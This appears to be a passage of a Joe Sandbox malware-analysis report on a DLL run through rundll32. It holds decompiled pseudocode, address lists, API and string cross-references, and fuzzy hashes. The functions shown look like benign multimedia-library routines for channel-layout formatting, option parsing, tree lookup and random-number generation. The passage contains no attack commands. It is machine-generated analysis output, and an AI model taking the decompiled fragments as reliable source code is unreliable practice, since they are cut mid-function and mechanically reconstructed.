0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
																_t272 = _t425 - _t397;
																if(_t425 >= _t397) {
																	goto L32;
																} else {
																	_t250 = 0;
																	if(_t425 == 0) {
																		L51:
																		_t432[2] = _t250;
																		_t432[1] = "AMBI%d";
																		 *_t432 = _t432[6];
																		L100089C0();
																	} else {
																		_t250 = _t425;
																		_t432[1] = 0x100aeacf;
																		_t64 = _t425 + 0x400; // 0x401
																		_t432[4] = _t64;
																		 *_t432 = _t432[6];
																		L100089C0();
																		_t292 = _t432[4];
																		if(_t425 <= 0x3ff) {
																			goto L51;
																		} else {
																			goto L47;
																		}
																	}
																}
															} else {
																if(_t160 == 1) {
																	_t272 = _t425;
																	_t432[4] = _t386[8];
																	_t432[5] = _t386[0xc];
																	L32:
																	_t432[7] = _t425;
																	_t182 = _t432[4];
																	_t292 = 0;
																	_t351 = _t432[5];
																	_t426 = _t386;
																	do {
																		_t387 = _t351;
																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
																		_t388 = _t387 >> _t292;
																		if((_t292 & 0x00000020) != 0) {
																			_t399 = _t388;
																		}
																		if((_t399 & 0x00000001) == 0) {
																			goto L34;
																		} else {
																			_t49 = _t272 - 1; // 0x0
																			_t402 = _t49;
																			if(_t272 != 0) {
																				_t272 = _t402;
																				goto L34;
																			} else {
																				_t386 = _t426;
																				_t425 = _t432[7];
																				if(_t425 != 0) {
																					_t432[4] = _t292;
																					_t432[1] = 0x100aeacf;
																					 *_t432 = _t432[6];
																					L100089C0();
																					_t292 = _t432[4];
																					L53:
																					if(_t292 <= 0x28) {
																						goto L41;
																					} else {
																						if(_t292 != 0xffffffff) {
																							goto L47;
																						} else {
																							goto L24;
																						}
																					}
																				} else {
																					if(_t292 > 0x28) {
																						L47:
																						_t432[2] = _t292;
																						_t432[1] = "USR%d";
																						 *_t432 = _t432[6];
																						L100089C0();
																					} else {
																						L41:
																						_t163 =  *(0x100af280 + _t292 * 8);
																						if(_t163 == 0) {
																							goto L47;
																						} else {
																							_t432[2] = _t163;
																							_t432[1] = "%s";
																							 *_t432 = _t432[6];
																							L100089C0();
																						}
																					}
																				}
																			}
																		}
																		goto L25;
																		L34:
																		_t292 =  &(1[_t292]);
																	} while (_t292 != 0x40);
																	_t386 = _t426;
																	_t425 = _t432[7];
																	if(_t425 == 0) {
																		goto L24;
																	} else {
																		goto L57;
																	}
																	goto L29;
																} else {
																	if(_t425 != 0) {
																		goto L57;
																	}
																	L24:
																	_t432[1] = "NONE";
																	 *_t432 = _t432[6];
																	L100089C0();
																}
															}
														}
													}
													L25:
													if( *_t386 != 2) {
														goto L18;
													} else {
														_t341 = _t386[8];
														_t166 = _t425 + _t425 * 2;
														_t293 = _t341 + _t166 * 8;
														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
															goto L18;
														} else {
															goto L27;
														}
													}
													goto L29;
													L27:
													_t425 =  &(1[_t425]);
													_t432[2] = _t293 + 4;
													_t432[1] = "@%s";
													 *_t432 = _t432[6];
													L100089C0();
													_t395 = _t386[4];
												} while (_t395 > _t425);
												goto L29;
												L18:
												_t395 = _t386[4];
												_t425 =  &(1[_t425]);
											} while (_t395 > _t425);
										}
										L29:
										if(_t395 == 0) {
											goto L15;
										} else {
											_t432[1] = 0x100aead1;
											 *_t432 = _t432[6];
											L100089C0();
											_t144 = 0;
										}
									} else {
										L15:
										_t148 = 0;
										L59:
										_t432[2] = _t148;
										_t432[1] = "%d channels";
										 *_t432 = _t432[6];
										L100089C0();
										_t144 = 0;
									}
								} else {
									_t337 = _t381 << 5;
									_t6 = _t337 + 0x100aec90; // 0x0
									_t243 =  *_t6;
									_t7 = _t337 + 0x100aec94; // 0x0
									_t333 =  *_t7;
									continue;
								}
								goto L12;
							}
							_t382 = _t381 << 5;
							_t432[1] = "%s";
							_t9 = _t382 + 0x100aec80; // 0x100aeabb
							_t432[2] =  *_t9;
							 *_t432 = _t432[6];
							L100089C0();
							L8:
							_t144 = 0;
						}
						L12:
						return _t144;
					}
				}
				L91:
			}

0x1000d4d1
0x1000d4d2
0x1000d4d3
0x1000d4d4
0x1000d4db
0x1000d4df
0x1000d4e3
0x1000d4e6
0x1000d4e9
0x1000d586
0x1000d58d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d4ef
0x1000d4ef
0x1000d55b
0x1000d570
0x00000000
0x1000d55d
0x1000d55d
0x1000d561
0x1000d564
0x1000d566
0x1000d567
0x1000d568
0x1000d569
0x1000d911
0x1000d914
0x1000d916
0x1000d917
0x1000d918
0x1000d91b
0x1000d920
0x1000da10
0x1000da15
0x00000000
0x1000d922
0x1000d925
0x1000d928
0x1000db65
0x1000db6f
0x1000db73
0x1000db76
0x1000db7e
0x1000db86
0x1000db8e
0x1000db93
0x1000dba0
0x1000dba6
0x1000dbad
0x1000dbb4
0x1000dbbd
0x1000dbc3
0x1000dbc7
0x1000dbcb
0x1000dbcf
0x1000dbd2
0x1000dbde
0x1000dbe2
0x1000dbe5
0x1000dbec
0x1000dbee
0x1000dbee
0x1000dc00
0x1000dc00
0x1000dc00
0x1000dbff
0x1000d92e
0x1000d92e
0x1000d931
0x1000d933
0x1000d93a
0x1000d963
0x1000d965
0x1000d96f
0x00000000
0x1000d971
0x1000d973
0x1000d94f
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d975
0x1000d97a
0x00000000
0x1000d97c
0x1000d980
0x1000d955
0x1000d955
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d980
0x1000d97a
0x1000d973
0x00000000
0x1000d957
0x1000d957
0x1000d958
0x1000d95b
0x1000da17
0x1000da19
0x00000000
0x1000da1f
0x1000da1f
0x1000da23
0x1000da27
0x1000da2b
0x1000da33
0x1000da38
0x00000000
0x1000da3e
0x1000da3e
0x1000da47
0x1000da4b
0x1000da4e
0x1000da53
0x1000da58
0x1000da5c
0x1000da5e
0x1000da5e
0x1000da62
0x1000da66
0x1000da69
0x1000da72
0x1000dac8
0x1000dad0
0x1000dad4
0x1000dad7
0x1000dadf
0x1000db44
0x1000db4f
0x1000db5c
0x1000da74
0x1000da7a
0x1000da7f
0x1000da85
0x1000da8c
0x1000da8c
0x1000da90
0x1000da9d
0x1000daa1
0x1000daa5
0x1000daae
0x1000dab2
0x1000dab5
0x1000dab5
0x1000dac3
0x1000dac3
0x1000da38
0x1000d93c
0x1000d982
0x1000d98e
0x1000d98e
0x1000d93a
0x1000d928
0x1000d920
0x1000d4f1
0x1000d4f3
0x1000d8e0
0x00000000
0x1000d4f9
0x1000d4f9
0x1000d4fc
0x1000d501
0x1000d503
0x1000d506
0x1000d527
0x1000d510
0x1000d514
0x1000d58f
0x1000d58f
0x1000d594
0x1000d59d
0x1000d5aa
0x1000d5ae
0x1000d5b1
0x1000d5b6
0x1000d5bb
0x1000d5c5
0x1000d5c7
0x1000d5c9
0x1000d5dc
0x1000d5dc
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8c3
0x1000d8cb
0x1000d8ce
0x00000000
0x1000d5e4
0x1000d5e4
0x1000d5e9
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83f
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ef
0x1000d5f2
0x1000d720
0x1000d726
0x1000d72e
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x00000000
0x1000d7c5
0x1000d7c5
0x1000d7c9
0x1000d85b
0x1000d85b
0x1000d864
0x1000d86c
0x1000d86f
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d7c9
0x1000d5f8
0x1000d5f9
0x1000d68b
0x1000d690
0x1000d694
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6d2
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6db
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d882
0x1000d88a
0x1000d88d
0x1000d892
0x1000d896
0x1000d899
0x00000000
0x1000d89f
0x1000d8a2
0x00000000
0x1000d8a8
0x00000000
0x1000d8a8
0x1000d8a2
0x1000d6e9
0x1000d6ec
0x1000d800
0x1000d800
0x1000d80d
0x1000d811
0x1000d814
0x1000d6f2
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x00000000
0x1000d701
0x1000d701
0x1000d70a
0x1000d712
0x1000d715
0x1000d715
0x1000d6fb
0x1000d6ec
0x1000d6e3
0x1000d6d9
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ff
0x1000d601
0x00000000
0x00000000
0x1000d607
0x1000d610
0x1000d614
0x1000d617
0x1000d617
0x1000d5f9
0x1000d5f2
0x1000d5e9
0x1000d620
0x1000d623
0x00000000
0x1000d625
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d634
0x00000000
0x1000d636
0x1000d63d
0x1000d63e
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d656
0x00000000
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d4
0x1000d5dc
0x1000d660
0x1000d662
0x00000000
0x1000d668
0x1000d671
0x1000d675
0x1000d678
0x1000d67d
0x1000d67d
0x1000d596
0x1000d596
0x1000d596
0x1000d8e3
0x1000d8e3
0x1000d8ec
0x1000d8f4
0x1000d8f7
0x1000d8fc
0x1000d8fc
0x1000d516
0x1000d518
0x1000d51b
0x1000d51b
0x1000d521
0x1000d521
0x00000000
0x1000d521
0x00000000
0x1000d514
0x1000d52f
0x1000d537
0x1000d53b
0x1000d541
0x1000d549
0x1000d54c
0x1000d551
0x1000d551
0x1000d551
0x1000d575
0x1000d57c
0x1000d57c
0x1000d4ef
0x00000000

APIs

mv_bprintf.MAIN ref: 1000D54C
mv_bprintf.MAIN ref: 1000D8F7

Strings

NONE, xrefs: 1000D60B
USR%d, xrefs: 1000D808
%d channels, xrefs: 1000D8E7
%d channels (, xrefs: 1000D5A5
@%s, xrefs: 1000D642
AMBI%d, xrefs: 1000D85F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
API String ID: 3083893021-1306170362
Opcode ID: efc4cf4070b613ff96981b1c53d9dde21975b7a6fb51727448d4ce29c3f6a9dc
Instruction ID: a65011a6159dd3c9d8d2b84384c130b43f4f86832dc80880a9240f1aa98400e9
Opcode Fuzzy Hash: efc4cf4070b613ff96981b1c53d9dde21975b7a6fb51727448d4ce29c3f6a9dc
Instruction Fuzzy Hash: E6B1A675A087468BD704EF68C48062EB7E1FF98394F15882EE989C7345EB31ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10032510 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 10032539
BCryptGenRandom.BCRYPT ref: 10032563
BCryptCloseAlgorithmProvider.BCRYPT ref: 1003257A
mvpriv_open.MAIN ref: 10032597
_read.MSVCRT ref: 100325B7
_close.MSVCRT ref: 100325C1
mvpriv_open.MAIN ref: 100325DC
_read.MSVCRT ref: 100325FC
_close.MSVCRT ref: 10032606
clock.MSVCRT ref: 100326E8

Strings

N, xrefs: 10032855
Microsoft Primitive Provider, xrefs: 10032514
RNG, xrefs: 1003251A

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
String ID: Microsoft Primitive Provider$N$RNG
API String ID: 4139849330-2077157618
Opcode ID: 18afe3c33630559fbd0355b581881ae8f3aa94268538246d15ca1b824b2066d5
Instruction ID: 296a7b6315f8af7d09067326692401f592c87ee6f10d7706e56fdac5cef6b261
Opcode Fuzzy Hash: 18afe3c33630559fbd0355b581881ae8f3aa94268538246d15ca1b824b2066d5
Instruction Fuzzy Hash: 55918E75A093108FE304EF38C9C061ABBE2EFC9312F95893EE9889B355E675D944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002C390 Relevance: 30.2, APIs: 6, Strings: 11, Instructions: 402COMMON

Download Yara Rule

APIs

mv_opt_find2.MAIN ref: 1002C491

Strings

Unable to parse option value "%s", xrefs: 1002C9BD
9, xrefs: 1002C740
-, xrefs: 1002C7A2
all, xrefs: 1002C56F
max, xrefs: 1002C505
const_values array too small for %s, xrefs: 1002C984
%d%*1[:/]%d%c, xrefs: 1002C919
The "%s" option is deprecated: %s, xrefs: 1002C850
default, xrefs: 1002C4D2
none, xrefs: 1002C54A
min, xrefs: 1002C51F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_opt_find2
String ID: %d%*1[:/]%d%c$-$9$The "%s" option is deprecated: %s$Unable to parse option value "%s"$all$const_values array too small for %s$default$max$min$none
API String ID: 2189843566-2859375014
Opcode ID: 730b512ef01ecd7330cf6e3f59345523149cc4a393a05c55e320839346850f87
Instruction ID: 478a8a207ff5b5307f9cfef852e9a26e9f05da79b4c8f966c849b1b138e3b10c
Opcode Fuzzy Hash: 730b512ef01ecd7330cf6e3f59345523149cc4a393a05c55e320839346850f87
Instruction Fuzzy Hash: CF023475A087498FC390DF69D08065BFBE5FFC9350F918A2EE9D987250EB35D8448B82

Uniqueness

Uniqueness Score: -1.00%

Function 100132D0 Relevance: 28.6, APIs: 19, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100132D0() {
				void* _t43;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr* _t95;

				_t95 = _t94 - 0x2c;
				_t87 =  *((intOrPtr*)(_t95 + 0x40));
				if(_t87 != 0) {
					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
						L4:
						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
						if(_t84 == 0) {
							L21:
							 *_t95 =  *_t87;
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 8));
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
							L23();
							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
							return __imp___aligned_free();
						}
						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
							L8:
							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
							if(_t93 == 0) {
								L20:
								 *_t95 =  *_t84;
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 8));
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
								L23();
								 *_t95 = _t84;
								L23();
								goto L21;
							}
							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
								L12:
								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
								if(_t78 == 0) {
									L19:
									 *_t95 =  *_t93;
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 8));
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
									L23();
									 *_t95 = _t93;
									L23();
									goto L20;
								}
								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
									L16:
									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
										E10012850(_t55);
										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
									}
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									 *_t95 =  *_t78;
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
									L23();
									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
									L23();
									goto L19;
								}
								_t72 = 0;
								do {
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
									_t72 = _t72 + 1;
									 *_t95 = _t61;
									L23();
									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
								goto L16;
							}
							_t73 = 0;
							do {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
								_t73 = _t73 + 1;
								 *_t95 = _t63;
								L23();
							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
							goto L12;
						}
						_t74 = 0;
						do {
							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
							_t74 = _t74 + 1;
							 *_t95 = _t65;
							L23();
						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
						goto L8;
					}
					_t75 = 0;
					do {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
						_t75 = _t75 + 1;
						 *_t95 = _t67;
						L23();
					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
					goto L4;
				}
				return _t43;
			}

0x100132d4
0x100132d7
0x100132dd
0x100132e8
0x10013304
0x10013304
0x10013309
0x10013439
0x1001343b
0x1001343e
0x10013446
0x10013449
0x10013451
0x10013454
0x10013459
0x100265b0
0x100265b0
0x10013314
0x10013334
0x10013334
0x10013339
0x10013411
0x10013413
0x10013416
0x1001341e
0x10013421
0x10013429
0x1001342c
0x10013431
0x10013434
0x00000000
0x10013434
0x10013344
0x10013364
0x10013364
0x10013369
0x100133e8
0x100133eb
0x100133ee
0x100133f6
0x100133f9
0x10013401
0x10013404
0x10013409
0x1001340c
0x00000000
0x1001340c
0x10013370
0x1001339c
0x1001339c
0x100133a1
0x100133a3
0x100133a7
0x100133ac
0x100133ac
0x100133b0
0x100133b6
0x100133b9
0x100133c5
0x100133c8
0x100133d4
0x100133d7
0x100133e0
0x100133e3
0x00000000
0x100133e3
0x10013372
0x10013380
0x10013380
0x10013387
0x1001338a
0x1001338b
0x1001338e
0x10013393
0x10013397
0x00000000
0x10013380
0x10013346
0x10013350
0x10013353
0x10013356
0x10013357
0x1001335a
0x1001335f
0x00000000
0x10013350
0x10013316
0x10013320
0x10013323
0x10013326
0x10013327
0x1001332a
0x1001332f
0x00000000
0x10013320
0x100132ea
0x100132f0
0x100132f3
0x100132f6
0x100132f7
0x100132fa
0x100132ff
0x00000000
0x100132f0
0x10013477

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd52e100bb25c0641e34a9b4921baf3855db5dcfffc71db4c92606c3f5dca5a
Instruction ID: 64132198df639edcb8f9d9942dd31ac045c1fee33f6b38aeafb66a389db015b7
Opcode Fuzzy Hash: cbd52e100bb25c0641e34a9b4921baf3855db5dcfffc71db4c92606c3f5dca5a
Instruction Fuzzy Hash: 2851AE79A04B518FCB10EF79D4C595AF7E0FF48214F41892DE9A98B309EB30F9858B91

Uniqueness

Uniqueness Score: -1.00%

Function 1004C500 Relevance: 26.2, APIs: 17, Instructions: 666COMMON

Download Yara Rule

APIs

mv_tree_insert.MAIN ref: 1004C57E
mv_tree_find.MAIN ref: 1004C757
mv_tree_find.MAIN ref: 1004C776

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_tree_find$mv_tree_insert
String ID:
API String ID: 3047205218-0
Opcode ID: 80c4f16b25e93cf13fac10a13682a04c4d944ea14c030e41bdf2d1b908fff40c
Instruction ID: a50688713867d27fbf14d738fefbaa6eb2d970f68efb82bc5577a16e2e7c4afa
Opcode Fuzzy Hash: 80c4f16b25e93cf13fac10a13682a04c4d944ea14c030e41bdf2d1b908fff40c
Instruction Fuzzy Hash: 7152CF75A087499FC344DF1AC08091AFBE2FFC8654F658A2DE889DB315E730E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1002082C Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 635
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E1002082C(signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t304;
				char* _t305;
				signed int _t314;
				signed int _t316;
				signed int _t325;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				int _t335;
				signed int _t336;
				signed int _t338;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed char* _t350;
				signed int _t351;
				int _t352;
				signed int _t354;
				int _t355;
				signed int _t356;
				signed int _t358;
				int _t361;
				signed int _t362;
				void _t364;
				signed int _t365;
				signed int _t367;
				signed int _t369;
				signed int _t372;
				intOrPtr _t379;
				intOrPtr _t380;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t386;
				signed int _t388;
				char* _t389;
				signed int _t393;
				signed char _t398;
				void* _t399;
				char* _t405;
				char _t406;
				char* _t408;
				signed int _t409;
				signed char _t411;
				signed int _t413;
				signed int _t414;
				signed int _t417;
				signed int _t418;
				signed short _t425;
				void* _t429;
				char* _t430;
				unsigned int _t434;
				signed int _t435;
				signed int _t437;
				signed char _t439;
				signed char* _t440;
				unsigned int _t441;
				signed int _t442;
				int _t444;
				signed char _t449;
				void* _t450;
				signed int _t453;
				signed int _t454;
				intOrPtr _t455;
				signed char _t456;
				signed char _t457;
				int _t458;
				char* _t463;
				char* _t464;
				signed int _t465;
				signed int _t467;
				signed int _t471;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t479;
				signed int* _t484;
				signed int _t489;
				signed int _t494;
				void _t495;
				char* _t496;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t502;
				void* _t503;
				signed int _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				void* _t514;
				signed int _t517;
				char* _t519;
				signed int _t526;
				signed int _t528;
				int _t533;
				signed int _t534;
				void* _t537;
				signed int* _t538;
				signed int _t539;
				char* _t540;
				void* _t541;
				unsigned int _t543;
				unsigned int _t544;
				signed int _t545;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t552;
				int _t553;
				void* _t554;
				char** _t555;
				signed int* _t557;
				void* _t571;

				_t465 = __edx;
				_t555 = _t554 - 0x6c;
				_t408 = _t555[0x24];
				_t519 = _t555[0x22];
				_t555[3] = _t555[0x27];
				 *_t555 = _t408;
				_t555[2] = _t555[0x26];
				_t555[1] = _t555[0x25];
				_t304 = E10020660(__edx, __eflags);
				 *_t555 = _t408;
				_t543 = _t304;
				_t305 = L10031C70();
				_t555[0x12] = _t305;
				_t430 = _t305;
				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
					_t544 = 0xffffffea;
					goto L28;
				} else {
					_t467 = _t430[4] & 0x000000ff;
					if(_t467 == 0) {
						_t496 = 0;
						_t555[0xf] = 0;
					} else {
